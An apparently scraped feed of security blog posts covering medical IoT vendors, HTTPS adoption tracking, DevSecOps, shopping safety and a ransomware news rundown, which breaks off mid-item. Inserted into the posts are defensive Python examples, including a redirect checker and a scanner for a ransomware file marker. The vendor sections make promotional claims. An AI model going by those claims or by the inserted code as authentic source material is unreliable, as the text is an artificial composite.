The IoT is an emerging space with a broad sphere of challenges that get even more complicated when placed in the healthcare context. Hospitals and other HDOs have limited visibility into which devices exist on their networks, how those devices behave, and what vulnerabilities they carry. This limited visibility and understanding impairs IT personnel’s ability to remediate without interrupting patient care.

Securing the healthcare IoT poses the multifold challenge of securing medical devices developed without security in mind. Many of these devices run on outdated operating systems and can’t be patched. Hospital staff often has limited knowledge of the scope of security risks and vulnerabilities introduced to the network by unprotected devices. This is further complicated by traditional security solutions that are ineffective in dealing with connected devices in general.

Hospitals also rely on various non-traditional medical devices to help deliver essential care, such as elevators used to transport patients and smart refrigerators used to store sensitive biological material and medications. These devices are connected to the clinical ecosystem and are involved in medical workflows but are often not given the proper priority when evaluating the security strategy.

The Solution

Cynerio’s holistic medical-first approach to healthcare / Medical IoT cybersecurity management provides HDOs with a one-stop shop they can rely on by prioritizing patient care and privacy above all else while contextualizing risk and remediation within the framework of healthcare business goals. This approach to security allows HDOs to gain control over their clinical assets and helps achieve immediate security goals and meet strategic, long-term objectives.

Cynerio’s agentless and nonintrusive solution analyzes device communications and behavior to provide ongoing, accurate, and contextual assessments of risk and security posture. This enables swift remediation without impacting operations.

Medigate is a comprehensive platform for IoT cybersecurity. Distinguished by powerful capabilities driving use-cases that have revolutionized expectations around what clinical visibility can mean, Medigate is successfully partnering with health systems across the world to monetize risk reduction practice.

Not unlike other industries, Healthcare’s vaunted digital transformation is based on unprecedented, new levels of visibility. Although having the ability to identify connected endpoints represents a step forward, it is not the game-changer. Rather, it’s the device-specific, detailed attribution and utilization metrics passively captured by Medigate that competitively separates its offering. Made even more real by meaningful and fully operationalized integrations to the systems that can naturally benefit (e.g. NAC, firewalls, SIEM, CMMS and emerging applications in supply chain, procurement and finance), Medigate’s excellent track record with some of the nation’s largest health systems is easily verified.

It is not “magic” and Medigate’s engineering-heavy company profile reflects it. Medigate has done the heavy lift required to passively fingerprint all connected assets, including serially connected modules and/or devices “hidden” behind legacy and modern integration points. The approach is known as deep packet inspection (DPI).  Having invested in the engineering talent required to effectively parse the transmission flows between devices, nested modules, integration points and their payload destinations (e.g. EMRs), Medigate delivers the most detailed and accurate baselines available, while also providing continuously monitored, dynamic views of the entire connected ecosystem.

Emboldened by widely publicized and successful attacks, the FDA’s changing guidance, Joint Commission directives and the recognition by acute care providers that ultimately, it’s a patient safety issue, risk capital has poured into the problem space. Validating Medigate’s approach, competitors use deep packet inspection (DPI) when they can and rely on probabilistic methods (i.e. behavioral models promoted as AI) when they cannot. For DICOM and other protocols packaged in the HL7 framework, all vendors use DPI, but that’s as far as they go, and that’s a seminal difference. Solution evaluators should investigate that difference and make up their own minds.

Medigate’s deterministic approach relies on its proven ability to resolve more than one hundred unique medical device protocols encompassing thousands of common devices that would otherwise go uncovered. The skillsets required to do that, and the resulting superior data quality, have fueled far more meaningful system integrations, non-traditional cross functional collaborations and numerous new use-cases that are turning risk reduction into a more strategically diverse, revenue creation practice. In terms of clinical network visibility, Medigate-powered “views” of what’s now possible are strengthening IT’s ROI mission to the enterprise.

Sternum, the multilayered cybersecurity solution offering real-time, embedded protection for IoT devices, was founded in 2018 in Tel Aviv by a team of highly experienced R&D and business leaders. Sternum has a profound understanding of embedded systems and deep insights into the dynamics of today’s threats, offering a new standard of cybersecurity for medical IoT devices. In accordance with the FDA’s pre-market cybersecurity guidelines (which included our commentary), and with unique technology that is ensuring the security of all connected medical devices, Sternum is protecting patients’ lives.

The result: Robust defense of lifesaving devices such as pacemakers and insulin pumps by mitigating known threats while simultaneously adapting to and combating new ones.


The company has developed two holistic solutions:

  • Sternum’s Embedded Integrity Verification (EIV) identifies and blocks cyberattacks in real time. This integrity-based attack prevention can be deployed to any medical device, including distributed and unmanaged IoT devices. EIV operates like an on-device firewall, validating each operation within the device. EIV only needs to be deployed once. Once EIV is installed, every new piece of code (including 3rd party) receives protection automatically, fitting into the low resource environment of medical devices and providing security throughout the device’s lifecycle.
  • Sternum’s Real-time IoT Event Monitoring System (RIEMS) provides first-of-its-kind visibility from within IoT devices (including operating systems and other 3rd party components) so that OEMs who manufacture the devices, enterprises who implement them, and consumers who use them are immediately alerted to indications of any cyber breach, including prevented attack attempts. RIEMS also continuously monitors devices outside managed networks, enabling OEMs to maintain control of product security for all distributed devices.

How is Sternum’s software-only product suite revolutionary in the medical IoT world?

  • Sternum, as a high-diversity and platform-agnostic solution, is the only on-device, real-time cybersecurity solution supporting all types of real-time operating systems (RTOS) and homegrown OS.
  • Sternum’s solution operates during runtime with exceptionally low overhead of 3%.
  • Because it operates in real time, the solution thwarts zero-day attacks.
  • While network security solutions fail to adequately secure today’s distributed medical devices, Sternum provides real-time monitoring of devices outside managed networks.
  • Cyberattack prevention is near-perfect when utilizing Sternum’s EIV solution; for over 170 cyberattacks, 96.5% were prevented when benchmarked with RIPE (Runtime Intrusion Prevention Evaluator).

Sternum’s unique, flexible cyber security solution for the Internet of Medical Things (IoMT) can be seamlessly integrated with any medical device’s operating system and development process.

Founded in 2017 by serial cybersecurity entrepreneurs Netanel Davidi and Uri Alter, VDOO has raised $45 million from top-tier investors including 83North, Dell Technology Capital, WRVI Capital, GGV Capital, NTT DOCOMO Ventures and MS&AD ventures. The company currently has more than 65 employees at our offices in the US, Japan and Israel, and dozens of well-known customers around the globe including Medtronic, Stanley Healthcare, NTT and MS&AD.

With device security quickly becoming a strategic imperative for the healthcare market, product security teams that work on medical devices cannot keep making long-term decisions based on a partial picture of possible vulnerabilities at a single stage of the device lifecycle. In order to scale their ability to provide optimal security, they must replace the time- and resource-intensive point solutions they are using today with a single integrated platform.

This is where VDOO comes in. Our Product Security Platform for Connected Devices is the only automated security solution that is integrated across the entire medical device lifecycle – from design and development all the way to deployment, post-deployment and legacy. The end-to-end platform includes modules for security analysis, gap resolution, regulatory compliance, embedded protection, operations monitoring, executive insights and threat intelligence.

VDOO’s unique approach to providing optimal security for medical devices is based on the combination of our patented technology with advanced binary analysis and highly sophisticated machine learning capabilities. This is augmented by our research team, which includes some of the world’s leading embedded security experts, that has built the most comprehensive device security database available today based on the thorough analysis of hundreds of millions of binaries and tens of thousands of connected products.

The VDOO platform’s key differentiators and benefits:

  1. Contextual and focused device-specific security – Speed up time-to-market and reduce the risk of attacks by cutting out the noise and focusing on the right threats
  2. Automated security processes for the entire device lifecycle – Improve the efficiency of SDLC processes, reducing operational resource requirements across the board
  3. Verified compliance with leading standards and regulations – Increase product sales while improving customer adoption by ensuring that all devices are compliant
  4. Full visibility into the software supply chain – Reduce dependency on third parties by owning your security, thus lowering legal, monetary and reputational risks
  5. Comprehensive end-point security visibility and analytics – Monetize security as a business model by offering monitoring and protection services to end-users

The post 5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT) appeared first on CyberDB.

Still Why No HTTPS?

Back in July last year, Scott Helme and I shipped a little pet project that tracked the world's largest websites not implementing HTTPS by default. We called it Why No HTTPS? and it gave people a way to see the largest websites not taking transport layer security seriously. We also broke the list down on a country-by-country basis and it quickly became a means of highlighting security gaps and serving as a "list of shame". I've had many organisations reach out and ask to be removed once they'd done their TLS things properly so clearly, the site is driving the right behaviour. Today, we're happy to share the first update since November last year.

The Web is More Secure More of the Time

Let's start with the good news: since the first release of this little project, HTTPS adoption has steadily trended upwards:

(Chart: HTTPS adoption over time since the first release of Why No HTTPS?)

We've gone from 70% of all HTTP requests being over the secure scheme to 80%, which is a pretty good effort in a relatively short amount of time. But, of course, it's the websites serving that remaining 20% of traffic that I want to focus on here. Let's begin with where we source the list of top sites from, and that's something we've changed for this release.

Bye Bye Alexa, Hello Tranco

When we launched the site, the list was based on the Alexa Top 1M. However, this list was becoming somewhat tricky to use reliably as Scott explained in October:

I used to use the Alexa Top 1 Million for this research but I've been having issues with the list. They tried to remove access at one point and while I managed to have it restored, there are other issues too. The accuracy of the data has been called into question and also the list itself has been having weird issues recently like not returning 1 million entries... Yep, that's right, the Alexa Top 1 Million list has been returning, in some cases, only ~650,000 entries recently, which is of course a problem.

Consequently, there are some differences in the way sites are ranked and as a result, there are some unexpected appearances. For example, the 21st largest site on the global list is Now obviously this isn't a website in the sense that folks go there looking for useful content (many would argue quite the contrary), but based on the Tranco data it's one of the most traffic'd websites in the world so it's within scope of this project.

So that's our starting point in terms of identifying which sites we assess, let's move onto the methodology around how a site ultimately makes our list.

Methodology and False-Positives

A quick recap on our methodology first: Scott runs a service which indexes a whole bunch of security things on the world's top million websites each day. He publishes the results of that effort via his free website (really Scott, .ninja?!) and I then roll the HTTP sites and HTTPS sites list into the Why No HTTPS? website. In that regard, it's quite simple. Except it's not really...

As I explained in this Q&A blog post last year, there are a whole bunch of reasons why a site that you see apparently doing things right might still be on our list. If you're going to chime in here with a bit of "But [blah].com loads over HTTPS by default for me", do please start by reading that blog post.

Read the post? Good! What we're left with pretty much boils down to an expectation that a site responds to an HTTP request over the insecure scheme with either a 301 or 302 (ideally the former so it's a permanent redirect) to a secure URL (multi-hop is also ok: a 301 to an HTTP address that then 301s to an HTTPS address is fine). If I make an insecure curl request from here in Australia, for example, and I get an HTTP 401 then the site goes onto the list. There has been some dissatisfaction over this methodology due to how much website behaviour can vary from location to location, so in this update we've added a means of getting a "free pass" that will automatically exclude a site from the list.

HSTS Preload Gives You an Immediate "Free Pass"

Preloaded HSTS is awesome (here's an old blog post that explains why). Once a site is pinned into the browser's static list of HSTS sites, insecure requests will always be upgraded and the 301 / 302 done by the website becomes redundant. Further, check out the requirements to be preloaded in the first place, in particular, this one:

Redirect from HTTP to HTTPS on the same host, if you are listening on port 80.

What this means is that if a site is in the preload list, we're comfortable excluding it from our list of shame. A great example of this is the domain I mentioned earlier - When I curl that address insecurely, here's what happens:

(Screenshot: curl output for an insecure request to the preloaded domain mentioned above)

Arguably, this should keep the site in scope of being on our list but because it's been successfully preloaded and the browser simply won't allow an insecure request, it gets a free pass. Other notable "free pass" sites include (a curl for me just 301s to a www prefixed address served insecurely) and...

(Screenshot: curl output for an insecure request to HIBP, returning a Cloudflare anti-automation page)

Over many years I've carefully honed a bunch of Cloudflare firewall rules to identify non-browser traffic that doesn't adhere to expected norms. The response above serves a body containing anti-automation (CAPTCHA) over the same scheme the request was made to (a Cloudflare behaviour). You shouldn't ever get that response in an actual browser but if you did, the fact that HSTS has been preloaded for the domain for years means the request would automatically be upgraded hence HIBP is really a false positive.

This practice of giving HSTS preloaded sites a free pass is something we hope will drive more websites in this direction. The next time someone reaches out and claims their site is incorrectly categorised that's going to be my first response - preload your domain then the next update to the site will keep you excluded.
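To make the rule above concrete, here is an added example (not code from the Why No HTTPS? project or from Scott's crawler) that classifies a domain the way the methodology describes: start from an insecure request, follow 301/302 redirects hop by hop (multi-hop allowed, relative Location values resolved), pass as soon as the chain lands on an https:// URL, put the site on the list when the chain ends on anything else (the 401 case above, a plain 200, or a redirect loop), and give a free pass when the host is on the preload list. The responses and the preload entries are constructed inline so it runs offline; the preload check treats a parent-domain entry as covering its subdomains, which is a simplification, since the real list carries an include_subdomains flag per entry.

```python
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for the HSTS preload list (hypothetical entries, not the real list).
HSTS_PRELOADED = {"preloaded.example"}

# Constructed responses to insecure requests: url -> (status, Location header or None).
SAMPLE_RESPONSES = {
    "http://good.example/": (301, "https://good.example/"),
    "http://multi.example/": (301, "http://www.multi.example/"),      # first hop stays on http
    "http://www.multi.example/": (301, "https://www.multi.example/"),  # second hop upgrades
    "http://plain.example/": (200, None),                              # serves content insecurely
    "http://unauth.example/": (401, None),                             # the 401 case from the post
    "http://preloaded.example/": (401, None),                          # same 401, but preloaded
    "http://loop.example/": (302, "http://loop.example/"),             # redirect loop
    "http://relative.example/": (302, "/login"),                       # relative Location, still http
    "http://relative.example/login": (200, None),
}

REDIRECT_STATUSES = {301, 302}


def is_preloaded(host, preloaded=HSTS_PRELOADED):
    """True when host, or a parent domain of it, is on the preload set.
    Assumption: a parent entry covers subdomains; the real list records an
    include_subdomains flag per entry, which this simplified check ignores."""
    labels = host.lower().split(".")
    return any(".".join(labels[i:]) in preloaded for i in range(len(labels) - 1))


def follow_insecure_request(domain, responses, max_hops=10):
    """Start at http://domain/ and follow 301/302 Location headers through the
    response map. Returns (reached_https, hops, last_status)."""
    url = f"http://{domain}/"
    hops = []
    for _ in range(max_hops):
        status, location = responses.get(url, (None, None))
        hops.append((url, status))
        if status not in REDIRECT_STATUSES or not location:
            break                        # terminal response (200, 401, ...) while still on http
        target = urljoin(url, location)  # resolve relative Location values against the current URL
        if urlsplit(target).scheme == "https":
            return True, hops + [(target, "https")], status
        if target == url:
            break                        # self-referential redirect loop
        url = target
    return False, hops, hops[-1][1]


def classify(domain, responses, preloaded=HSTS_PRELOADED):
    """Decide whether a domain belongs on the 'no HTTPS by default' list."""
    if is_preloaded(domain, preloaded):
        return {"domain": domain, "on_list": False, "reason": "HSTS preloaded (free pass)"}
    reached, hops, status = follow_insecure_request(domain, responses)
    if reached:
        return {"domain": domain, "on_list": False,
                "reason": f"redirects to HTTPS in {len(hops) - 1} hop(s)"}
    if status in REDIRECT_STATUSES:
        reason = "redirect chain never reached HTTPS (missing Location, loop or too many hops)"
    elif status is None:
        reason = "no response recorded"
    else:
        reason = f"insecure request ended with HTTP {status}"
    return {"domain": domain, "on_list": True, "reason": reason}


if __name__ == "__main__":
    for d in ["good.example", "multi.example", "plain.example", "unauth.example",
              "preloaded.example", "loop.example", "relative.example"]:
        r = classify(d, SAMPLE_RESPONSES)
        print(f"{d:20} on_list={str(r['on_list']):5} {r['reason']}")
```

The hop limit matters in practice: without it a misconfigured site that bounces between two insecure hostnames would keep the checker busy forever, and a chain that hits the limit without ever reaching https:// is still a site that does not upgrade by default.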

Check the Diffs on GitHub

Lastly, if you'd like to see exactly what's changed in the data set, check out the public GitHub repository. You'll see all the input data and all the output data, the latter being precisely the files that drive the Why No HTTPS? website. I personally find it interesting to look at diffs on files such as the top50-au.json one as it gives me a really good sense of what's changed. I've ordered these files by domain name rather than rank to make things a little easier, but of course with ranks regularly changing anyway, and then the move from Alexa to Tranco, there's going to be a heap of changes from last time even if the HTTPS status hasn't changed. At the very least though, it makes it super easy to see which sites have now dropped off the list altogether.

Comments Below

There's always a bunch of feedback on these releases and people often find really interesting things in the data. Do chime in below, keeping in mind the earlier point about reading the Q&A blog post first. And, of course, please continue to use this site as leverage to move more organisations in the "secure by default" direction.

Making Moves: How to Successfully Transition to DevSecOps

As we look toward the future, it is becoming critical that development organizations are not only agile and flexible but – just as important – secure. In turn, security and development need to work together more closely than ever before. When security and development are in unison, organizations can produce higher quality code quicker and more securely while reducing costs and conforming to regulations. Most companies realize that DevSecOps is the true nirvana, but they are not sure how to get there.

For starters, a successful transition to DevSecOps means that security and development teams need to reevaluate their roles. Ensuring the stability and security of software is no longer just the security team’s responsibility, it now includes developers. Developers should be testing, and security professionals should now be governing the testing. This culture shift can be a real challenge given that most security professionals have never worked alongside development teams and are not familiar with their processes, priorities, or tools. But once security and development teams are able to successfully work hand in hand, DevSecOps is achievable.  

With this culture shift in mind, how do we formulate an AppSec strategy that transforms DevOps into DevSecOps? In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis provides an outline of the security tools and techniques needed at each stage in the software development lifecycle:

Define and Architect Phase

Reference security architectures: Reference security architectures – or service provider guidelines for cloud services – to understand the rules and policies that dictate how applications operate and communicate. Once you are familiar with the security architecture, you should work with development to come up with operational standards. Some important operational standards to consider include minimal testing security requirements, time frames for fixing issues, and when to break a build.  

Security requirements: Decide which security tests should be run prior to deployment. Are you going to test for OWASP Top Ten vulnerabilities?

Monitoring and metrics: Consider what metrics you need to improve releases or problematic code or to determine what is working well. You should also think about what data you want to collect and build it into your CI/CD and production environments to measure how your scripts and tests perform.

Design Phase

Security design principles: Follow security design and operational principles because they offer valuable security improvement recommendations. Following these principles can be time consuming, but IT and development typically help because it benefits them as well.

Secure the deployment pipeline: Ensure that development and test environments are secure. Set up strict access controls for CI/CD pipelines and additional monitoring for scripts running continuously in the background.

Threat modeling: Teach the development team about common threat types and help them plan out tests to address attacks. If your security team is not able to address threat monitoring internally, you can consider hiring a consultant.

Develop Phase

Automate: Automating security testing at this phase is key.

Secure code repositories: Make it easy for developers to get secure and internally approved open source libraries. How? Consider keeping local copies of approved, easy-to-access libraries, and use a combination of composition analysis tools and scripts to make sure developers are using the approved versions.
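As an added illustration of the "approved versions" check described above (not code from Securosis or from any particular composition analysis tool), the following script parses a requirements.txt-style dependency list and reports anything that is not on an internal allowlist, not pinned to an exact version, or pinned to a version that has not been approved. The allowlist and the requirements text are constructed for the example; in a real pipeline the allowlist would come from the curated local repository and the script would run as a CI step that fails the build on findings.

```python
import re

# Constructed allowlist of internally approved libraries and versions (hypothetical).
APPROVED = {
    "requests": {"2.31.0", "2.32.3"},
    "pyyaml": {"6.0.1"},
    "cryptography": {"42.0.5"},
}

# Constructed requirements.txt content for the example.
SAMPLE_REQUIREMENTS = """\
# application dependencies
requests==2.32.3
PyYAML==6.0.1          # name case differs from the allowlist; normalized below
cryptography==41.0.0   # pinned, but to a version that is not approved
left-pad-py>=1.0       # range specifier, not on the allowlist
flask                  # unpinned and not on the allowlist
"""

# name, optional comparison operator, optional version (stops at whitespace, ';' or '#').
LINE_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|>=|<=|~=|!=|>|<)?\s*([^\s;#]*)")


def parse_requirements(text):
    """Yield (normalized_name, operator, version) for each non-comment, non-empty line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        match = LINE_RE.match(line)
        if match:
            name, op, version = match.groups()
            # PyPI names are case-insensitive and treat '_' and '-' alike.
            yield name.lower().replace("_", "-"), op, version or None


def check_requirements(text, approved=APPROVED):
    """Return a list of (name, problem) findings. An empty list means every
    dependency is on the allowlist and pinned to an approved version."""
    findings = []
    for name, op, version in parse_requirements(text):
        if name not in approved:
            findings.append((name, "not on the approved list"))
        elif op != "==" or not version:
            findings.append((name, "not pinned to an exact version"))
        elif version not in approved[name]:
            findings.append((name, f"version {version} not approved"))
    return findings


if __name__ == "__main__":
    problems = check_requirements(SAMPLE_REQUIREMENTS)
    for name, problem in problems:
        print(f"{name}: {problem}")
    raise SystemExit(1 if problems else 0)   # non-zero exit fails a CI build
```

Exact pinning is deliberate: a range such as `>=1.0` lets a future, unreviewed release into the build, which is the gap the approved-versions policy exists to close.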

Security in the scrum: Set up your "security champions" program, training selected members of the development teams in security basics, to help with these security tasks.

Test-driven development: Consider incorporating security into test-driven development, where tests are constructed along with code.  

Interactive Application Security Testing (IAST): Analyze your application’s code using IAST. The IAST scanner aims to find security vulnerabilities before you launch code into production.

Test Phase

Design for failure: The thought process behind this concept is, if there is a flaw with your application, it is better that you break it than an attacker.

Parallelize security testing: Address security tests that are slowing down your deployments by running multiple tests in parallel. Reconfiguring test environments for efficiency helps with Continuous Integration.

Pre-Release Phase

Elasticity: Make sure your security testing leverages on-demand elastic cloud services to speed up security testing.

Test data management: Prevent unnecessary data breaches by locking down production environments so quality assurance and development personnel cannot exfiltrate regulated data or bypass your security controls. Consider using tools like data masking or tokenization, which deliver test data derived from production data but without the sensitive information.

Deploy Phase

Manual vs. automated deployment: Use automation whenever possible. It is okay to use some manual processes, but it is important to remember that the more you automate, the more capacity the team will have to test and monitor. 

Deployment and rollback: Start by using smoke tests to make sure that the test code that worked in pre-deployment still works in deployment. Then, if you need to augment deployment, use one of these three tricks. The first is Blue-Green or Red-Black deployment, where old and new code run simultaneously on their own sets of servers. The rollout is simple and, if errors are uncovered, the load balancers are pointed back to the older code. The second is canary testing, in which a small subset of individual sessions is directed toward the new code. If errors are encountered and the canary dies, the new code is retired until the issue is fixed. Lastly, feature tagging enables and disables new code elements. If errors are found in a new section of code, you can toggle off the feature until it is fixed.

Production security tests: Note that it is common for applications to continue to function even when security controls fail. Consider employing penetration testers to examine the application at runtime for flaws.

Learn More

By embracing the role changes brought about by DevOps and working with developers to add security tools and techniques into the software delivery lifecycle, you can successfully transition to DevSecOps.

Get more detailed information on building out a DevSecOps program in the Securosis report, Building an Enterprise DevSecOps Program.

Webcast: Passwords: You Are the Weakest Link

Why are companies still recommending an 8-character password minimum?  Passwords are some of the easiest targets for attackers, yet companies still allow weak passwords in their environment. Multiple service providers recommend 8-character minimum passwords based on outdated data.  Download Slides: 3:26 – In The Beginning 4:23 – What The Experts Say: PCI 5:55 – What The Experts Say: […]

The post Webcast: Passwords: You Are the Weakest Link appeared first on Black Hills Information Security.

5 Reasons Why Programmers Should Think like Hackers

Programming has five main steps: the identification and definition of the problem, the planning of the solution for the problem, coding of the program, testing, and documentation. It's a meticulous process that cannot be completed without going through all the essential points. In all of these, security must be taken into account. As you come up with a solution to the problem and write the

Dominic Cummings: If Leave had lost Brexit vote, I’d have queried result as invalid

Boris Johnson aide wrote to data watchdog in 2017 complaining electoral system was ‘wide open to abuse’

Boris Johnson’s adviser Dominic Cummings would have challenged the EU referendum result as “invalid” had Vote Leave lost the Brexit campaign.

According to documents seen by the Observer, the prime minister’s chief aide told the UK’s data watchdog that he would have contested the result because UK elections are “wide open to abuse.”

Continue reading...

Cybersecurity Tips for Online Holiday Shopping

The holiday shopping season is prime time for digital purchases and cybercriminals are cashing in on the merriment. With online shopping officially becoming more popular than traditional in-store visits this year, all signs point to an increase in cyberattacks. It’s more important than ever to be mindful of potential dangers so you can avoid getting Scrooged when buying online. Follow these top tips for secure online shopping.

Want to give the gift of cybersecurity? Internet Security Complete includes Identity Shield, designed to protect your browsing, shopping, banking, and social media.

Only use credit cards. If your debit card gets compromised, it has the potential to cascade in catastrophic ways; automatic bill payments may bounce or overdraft protections may drain secondary accounts. Some banks also have strict rules about when you need to notify them of suspected fraud, or else you could be liable for the costs.

On the other hand, the Fair Credit Billing Act provides some protections for consumers from unauthorized charges on credit cards. Additionally, it’s much easier to have your credit card replaced with new, uncompromised numbers and details than it is with bank account info.

Be cautious of deal and discount emails. During the holidays, there’s always a spike in physical and electronic mailers about special deals. At this point, we’re all used to that. We might even wait to buy something we want, knowing that it’ll probably go on sale during holiday clearance. Unfortunately, criminals use this expectation against us by sending cleverly crafted phishing emails to trick us into compromising our data.

Always be cautious about emails from unknown senders or even trusted third-party vendors, especially around the holidays. Always navigate to the deal website separately from the email — don’t just click the link. If the deal link can only be accessed through the email, it’s best to pass up on those supposed savings. It is also prime time for emails offering “free gift cards”; avoid those like the plague.

Never make purchases without HTTPS. Check the URL—if it doesn’t start with HTTPS, it doesn’t have SSL encryption. SSL (secure sockets layer) encryption is a security standard for sharing information between web servers and a browser. Without it, your private information, including your credit card number, can be more easily intercepted by cybercriminals.

Keep in mind: HTTPS only ensures that the data you send will be encrypted on the way, not that the destination is legit. Cybercriminals have started to use HTTPS to trick website users into a false sense of security. That means, while you should never send private or financial data through a site that doesn’t have HTTPS, you shouldn’t rely on the presence of HTTPS alone to guarantee the security of the page.

Don’t make purchases on devices you don’t personally own. If you’re using a borrowed or shared device, such as a computer at a library or a friend’s phone, don’t make any purchases. Even if it’s a seemingly safe device that belongs to a person you know and trust, you have no way of knowing how secure it really is. It’s pretty unlikely that you’ll encounter a lightning deal that’s worth the hassle of financial fraud or identity theft. So just wait on that purchase until you can make it on your own device.

Never use unsecured public WiFi for online purchases. Many public WiFi networks, like the ones at your local café, the gym, a hotel, etc., are completely unsecured and unencrypted. That means anyone with the know-how can easily track all of your online activities while you’re using that network, including any login or banking information. Even worse, hackers are capable of dropping viral payloads onto your device through public networks, which can then spread to your other devices at home.

Always use a VPN when you’re on public WiFi, if you have to use it at all. Otherwise, we suggest using a private mobile hotspot from your phone instead. (See our section on VPNs below.)

Use a password manager to create strong passwords. You can often stop a security breach from spreading out past the initial impact point just by using a trusted password manager, such as LastPass, which will help you create strong passwords. A password manager will create and store them for you, conveniently and securely, so you don’t have to remember them or write them down somewhere. Taking this step will help protect you from potential third-party breaches as well, like the one Amazon announced just before Black Friday in 2018.

Encrypt your traffic with a virtual private network (VPN). A VPN allows you browse privately and securely by shielding your data and location in a tunnel of encryption. So even if you are unwittingly using a compromised network, such as the unsecured public WiFi at your favorite morning coffee stop, your VPN will prevent your private data from being scooped up by cybercriminals. But be sure you’re using a trusted VPN—many free options secretly collect and sell your data to turn a profit.

Install antivirus software and keep it up to date. A VPN will protect your data from being tracked and stolen, but it can’t protect you if you click on a malicious link or download a virus. Make sure your antivirus software is from a reliable provider and that it’s not only installed, but up to date. Most antivirus products today will even update themselves automatically (as long as you don’t turn that feature off), so make sure you have such settings enabled. It may make all the difference when it comes to preventing a security breach.

Keep a close eye on your bank and credit accounts for suspicious activity. The fact of the matter is that the holiday season causes a peak in malicious online activity. Be proactive and check all of your financial records regularly for suspicious charges. The faster you can alert your bank or credit provider to these transactions, the faster you can get a replacement card and be back on your merry way.

Don’t fall victim to cybercrime this holiday season. Be mindful of all the links you click and online purchases you make, and be sure to protect your devices (and your data and identity) with a VPN and strong antivirus software!

The post Cybersecurity Tips for Online Holiday Shopping appeared first on Webroot Blog.

How To Get The Most Out Of Industry Analyst Reports

Whether you’re trying to inform purchasing decisions or just want to better understand the cybersecurity market and its players, industry analyst reports can be very helpful. Following our recent accolades by Forrester and IDC in their respective cloud security reports, we want to help customers understand how to use this information.

Our VP of cybersecurity, Greg Young, taps into his past experience at Gartner to explain how to discern the most value from industry analyst reports.

The post How To Get The Most Out Of Industry Analyst Reports appeared first on .

Cyber News Rundown: Zeppelin Ransomware

Zeppelin Ransomware Spreading

Over the last month, researchers have been monitoring the spread of a new ransomware variant, Zeppelin. This is the latest version of the ransomware-as-a-service that started life as VegaLocker/Buran and has differentiated itself by focusing on healthcare and IT organizations in both the U.S. and Europe. This variant is unique in that extensions are not appended, but rather a file marker called Zeppelin can be found when viewing encrypted files in a hex editor.
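A defender-side sweep for the file marker described above, as an added example that is not part of the original post. It assumes the marker is the ASCII bytes "Zeppelin" at an unspecified offset (the post gives neither encoding nor position), so the whole file is searched; the files it scans are constructed in a temporary directory.

```python
"""Scan a directory tree for files carrying the assumed Zeppelin file marker.

Because this variant does not append an extension, a name-based check would
miss encrypted files; this scanner looks for the marker bytes instead.
"""
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional

# Assumed marker bytes: the post names the marker "Zeppelin" but does not
# specify its encoding or offset, so ASCII is assumed and the whole file is read.
ZEPPELIN_MARKER = b"Zeppelin"

# Files are read in chunks so large files are not loaded into memory at once.
CHUNK_SIZE = 1 << 20


def find_marker(path: Path, marker: bytes = ZEPPELIN_MARKER) -> Optional[int]:
    """Return the byte offset of the first occurrence of `marker`, or None.

    Consecutive chunks overlap by len(marker) - 1 bytes so that a marker
    straddling a chunk boundary is still detected.
    """
    overlap = len(marker) - 1
    tail = b""   # carried-over bytes from the previous chunk
    base = 0     # file offset at which `tail` begins
    with path.open("rb") as fh:
        while True:
            chunk = fh.read(CHUNK_SIZE)
            if not chunk:
                return None
            buf = tail + chunk
            idx = buf.find(marker)
            if idx != -1:
                return base + idx
            # Keep only the last `overlap` bytes for the next iteration.
            keep = min(overlap, len(buf))
            base += len(buf) - keep
            tail = buf[len(buf) - keep:]


def scan_tree(root: Path, marker: bytes = ZEPPELIN_MARKER) -> Dict[str, int]:
    """Walk `root` and map POSIX-style relative paths of marked files to the offset."""
    hits: Dict[str, int] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                off = find_marker(p, marker)
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if off is not None:
                hits[p.relative_to(root).as_posix()] = off
    return hits


def build_sample_tree(root: Path) -> None:
    """Create constructed sample files: two 'encrypted' files carrying the
    marker (one with it straddling the chunk boundary) and one clean file."""
    (root / "docs").mkdir(parents=True, exist_ok=True)
    # Marker near the start; the original extension is left untouched.
    (root / "docs" / "budget.xlsx").write_bytes(
        b"\x00" * 16 + ZEPPELIN_MARKER + b"\x8f" * 64)
    # Marker positioned so that it crosses the CHUNK_SIZE read boundary.
    (root / "notes.txt").write_bytes(
        b"A" * (CHUNK_SIZE - 3) + ZEPPELIN_MARKER + b"B" * 10)
    # Clean file that must not be reported.
    (root / "readme.md").write_bytes(b"# nothing to see here\n")


def demo() -> Dict[str, int]:
    """Build the constructed tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, off in sorted(demo().items()):
        print(f"{rel}: marker at offset {off}")
```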

German ISP Faces Major GDPR Fine

The German internet service provider (ISP) 1&1 was recently fined for failing to protect the identity of customers who were reaching out to their call centers for support. While the incident took place in 2018, GDPR is clear about imposing fines for organizations that haven’t met security standards, even if retroactive changes were made. 1&1 is attempting to appeal the fines and has begun implementing a new authentication process for confirming customers’ identities over the phone.

Turkish Credit Card Dump

Nearly half a million payment cards belonging to Turkish residents were found in a data dump on a known illicit card selling site. The cards in question are both credit and debit cards and were issued by a variety of banking institutions across Turkey. This likely means that a mediating payment handler was the source of the leak, rather than a specific bank. Even more worrisome, the card dump contained full details on the cardholders, including expiration dates, CVVs, and names; everything a hacker would need to make fraudulent purchases or commit identify theft.

Pensacola Ransomware Attack

The city of Pensacola, Florida was a recent victim of a ransomware attack that stole, then encrypted their entire network before demanding $1 million ransom. In an unusual message, the authors of the Maze ransomware used explicitly stated that they had no connection to the recent shootings at the Pensacola Naval Base, nor were they targeting emergency services with their cyberattack.

Birth Certificate Data Leak

